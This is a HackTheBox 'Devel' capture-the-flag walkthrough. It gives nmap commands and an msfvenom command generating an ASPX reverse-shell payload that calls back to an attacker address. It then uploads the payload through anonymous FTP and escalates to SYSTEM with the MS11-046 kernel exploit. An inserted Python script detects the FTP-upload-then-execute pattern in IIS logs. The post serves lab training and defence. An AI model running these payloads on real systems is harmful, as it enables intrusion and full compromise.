HackTheBox — Devel Walkthrough

0xNeel
Aug 22, 2019


Following is the HackTheBox Devel machine’s walkthrough.

Vulnerability Exploited: Microsoft IIS7 Remote/Local File Inclusion Vulnerability

Privilege Escalation Vulnerability: MS11-046 AFD.sys Vulnerability

Steps:

Perform an Nmap port scan on all ports:

Command: nmap -Pn -p- -sV --reason 10.10.10.5

Perform a detailed port scan of earlier detected ports 21 and 80:

Command: nmap -sS -sV -sC --open --reason -p 21,80 10.10.10.5

Upon visiting the webpage, we see the default IIS page:

Based on the above service enumeration result, FTP allows anonymous login:

Let's try to access the local file iisstart.htm listed above via the HTTP service.

We can access the file, so we can conclude that the FTP service lands us inside the HTTP web root (the directory IIS serves from).

Now, create a reverse shell payload file:

Command: msfvenom --payload windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 --platform windows --format aspx > payload.aspx

Start Netcat listener:

Command: nc -nvlp 4444

Upload payload on the target machine using FTP service:

Execute payload from browser:

Received reverse shell on port 4444 with limited access:
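As an added defensive example (not part of the original writeup), the following Python script correlates IIS FTP and IIS web logs to flag the pattern used above: an executable file written over FTP into the web root and then requested over HTTP shortly afterwards. The log lines are constructed samples in W3C style; the exact field order is an assumption and should be taken from the `#Fields:` header of real logs.

```python
from datetime import datetime

# Constructed sample IIS FTP log (W3C style; field order is an assumption).
FTP_LOG = """\
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2019-08-22 10:00:01 10.10.14.5 anonymous 10.10.10.5 21 USER anonymous 331 0 0 1 -
2019-08-22 10:00:01 10.10.14.5 anonymous 10.10.10.5 21 PASS *** 230 0 0 1 /
2019-08-22 10:00:05 10.10.14.5 anonymous 10.10.10.5 21 STOR payload.aspx 226 0 0 1 /payload.aspx
2019-08-22 10:00:09 10.10.14.5 anonymous 10.10.10.5 21 STOR notes.txt 226 0 0 1 /notes.txt
"""

# Constructed sample IIS web log (W3C style; field order is an assumption).
WEB_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2019-08-22 10:00:30 10.10.10.5 GET /iisstart.htm - 80 - 10.10.14.5 200
2019-08-22 10:00:45 10.10.10.5 GET /payload.aspx - 80 - 10.10.14.5 200
"""

# Extensions IIS will execute rather than serve as static content.
EXEC_EXT = (".aspx", ".asp", ".ashx", ".asmx", ".exe", ".dll")

def parse_w3c(text):
    """Parse W3C extended log text into a list of dicts keyed by the #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows

def ts(row):
    return datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")

def find_ftp_upload_then_http_exec(ftp_text, web_text, window_s=600):
    """Flag STOR of an executable file followed within window_s by an HTTP request for it."""
    uploads = [r for r in parse_w3c(ftp_text)
               if r["cs-method"] == "STOR" and r["x-fullpath"].lower().endswith(EXEC_EXT)]
    requests = parse_w3c(web_text)
    hits = []
    for up in uploads:
        path = up["x-fullpath"].lower()
        for req in requests:
            delay = (ts(req) - ts(up)).total_seconds()
            if req["cs-uri-stem"].lower() == path and 0 <= delay <= window_s:
                hits.append({"client": up["c-ip"], "user": up["cs-username"],
                             "path": path, "delay_s": int(delay)})
    return hits

if __name__ == "__main__":
    for hit in find_ftp_upload_then_http_exec(FTP_LOG, WEB_LOG):
        print("ALERT: executable uploaded via FTP then executed over HTTP:", hit)
```

An FTP site whose root is the web root (or any FTP account that can write to it) is the underlying misconfiguration; the correlation above detects its use, but the fix is to separate the FTP root from `wwwroot` and disable anonymous write access.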

While performing post-exploitation checks (steps from https://www.fuzzysecurity.com/tutorials/16.html), I found the Ancillary Function Driver (AFD), which supports Windows sockets applications and is vulnerable to elevation of privilege.

Command: driverquery

Command: searchsploit afd windows local privilege escalation

MS11-046 is a kernel-level exploit. Let's download the windows-kernel-exploits repository from GitHub.

Command: git clone https://github.com/SecWiki/windows-kernel-exploits.git

Copy the exploit from the cloned repository to the working directory:

Set the execution bit on the exploit and upload it to the target machine.

Go to the C:\inetpub\wwwroot directory, where the uploaded exploit is located, and execute it.

We got SYSTEM privileges.
